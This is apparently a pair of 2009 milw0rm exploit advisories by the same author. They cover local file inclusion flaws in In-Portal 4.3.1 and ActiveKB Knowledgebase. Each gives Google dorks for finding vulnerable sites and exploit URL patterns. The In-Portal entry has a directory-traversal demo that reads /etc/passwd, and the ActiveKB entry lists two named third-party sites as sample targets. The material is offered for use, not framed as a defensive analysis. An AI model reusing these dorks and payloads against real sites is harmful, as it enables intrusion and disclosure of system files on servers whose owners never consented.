@ ========================================================================@
Title : Local File Inclusion Vulnerability
Software : In-Portal 4.3.1
Vendor : http://www.in-portal.net/ [-]
Date : 01 August 2009 (Indonesia)
Author : Angela Chang
Contact : mizz_4ng3l@yahoo.com
@ =========================================================================@
[-] Dork
"Powered by In-portal"
[-] Exploit
http://[site]/[path]/index.php?env=-/[LFI]
[-] Demo
http://www.in-portal.net/demo/index.php?env=-/../../../../../../../../../..
/../../../../../etc/passwd
{o} ========================================================================{o}
Greetz : -:- SkyCreW -:-
Nyubi (Solpot) , Vrs-hCk , OoN_BoY , NoGe , Paman , zxvf , home_edition2001
str0ke
{o} ========================================================================{o}
# milw0rm.com [2009-08-04]
bug ke 3 ku
http://milw0rm.com/exploits/9358
[o]------------------------------------------------------------------------[x]
| Local File Inclusion Vulnerability
[o]------------------------------------------------------------------------[o]
| Software : ActiveKB Knowledgebase version X.X |
| Vendor : http://www.interspire.com/activekb/ |
| Date : 02 April 2009 |
| Author : Angela Chang |
| Contact : mizz_4ng3l@yahoo.com |
[o]--------------------------------------------------------------------------[o]
[»] Google Dork
"Powered by ActiveKB Knowledgebase Software"
inurl:loadpanel.php?Panel=
[»] Vulnerable
./loadpanel.php
[»] Exploit
http://[site]/[path]/loadpanel.php?Panel=[LFI]
[»] Sample
http://help.theedweb.com/activekb/loadpanel.php?Panel=[LFI]
http://my.myriadnetwork.com/kb//loadpanel.php?Panel=[LFI]
[o]---------------------------------------------------------------------------[x]
| Greetz : Speciale Thanks FoR : |
[o]---------------------------------------------------------------------------[o]
| Vrs-hCk , Nyubi (Solpot) , OoN_Boy |
[o]-----------------------------------------------------------------------------[o]
# milw0rm.com [2009-04-03]
bug kedua ku nech
http://milw0rm.com/exploits/8346